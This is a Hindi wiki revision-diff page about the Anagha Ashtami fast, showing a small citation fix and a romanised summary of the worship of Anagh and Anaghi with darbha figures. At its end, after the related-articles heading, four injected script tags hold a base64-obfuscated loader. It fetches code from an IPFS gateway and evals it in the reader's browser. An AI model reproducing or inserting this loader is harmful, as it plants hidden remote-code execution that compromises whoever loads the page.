Difference between revisions of "अनघा अष्टमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
m (Text replace - "ref> (" to "ref>")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*[[मार्गशीर्ष]] [[कृष्ण पक्ष]] की [[अष्टमी]] को अनघ एवं अनघी<ref> (दर्भ से वासुदेव एवं लक्ष्मी की प्रतिमा बनायी जाती है</ref> की पूजा की पूजा की जाती है।
+
*[[मार्गशीर्ष]] [[कृष्ण पक्ष]] की [[अष्टमी]] को अनघ एवं अनघी<ref>दर्भ से वासुदेव एवं लक्ष्मी की प्रतिमा बनायी जाती है</ref> की पूजा की पूजा की जाती है।
 
*डाभ के अनघ और अनघी निर्माण करके गोबर से पोती हुई वेदी पर विराजमान कर गन्धादि से उसका पूजन करे।  
 
*डाभ के अनघ और अनघी निर्माण करके गोबर से पोती हुई वेदी पर विराजमान कर गन्धादि से उसका पूजन करे।  
 
*[[शूद्र]] नमस्कार करते हैं और अन्य लोग [[ऋग्वेद]] अतो देवा<ref>ऋग्वेद 1|22|16</ref> का मन्त्र पढ़ते हैं।<ref>भविष्योत्तर (58|1</ref>
 
*[[शूद्र]] नमस्कार करते हैं और अन्य लोग [[ऋग्वेद]] अतो देवा<ref>ऋग्वेद 1|22|16</ref> का मन्त्र पढ़ते हैं।<ref>भविष्योत्तर (58|1</ref>

Latest revision as of 14:11, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh krishna paksh ki ashtami ko anagh evan anaghi[1] ki pooja ki pooja ki jati hai.
  • dabh ke anagh aur anaghi nirman karake gobar se poti huee vedi par virajaman kar gandhadi se usaka poojan kare.
  • shoodr namaskar karate haian aur any log rrigved ato deva[2] ka mantr padhate haian.[3]
  • is prakar pratyek krishnaashtami ko ek varsh tak kare to sampoorn prakar ke pap door ho jate haian.


tika tippani aur sandarbh

  1. darbh se vasudev evan lakshmi ki pratima banayi jati hai
  2. rrigved 1|22|16
  3. bhavishyottar (58|1

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>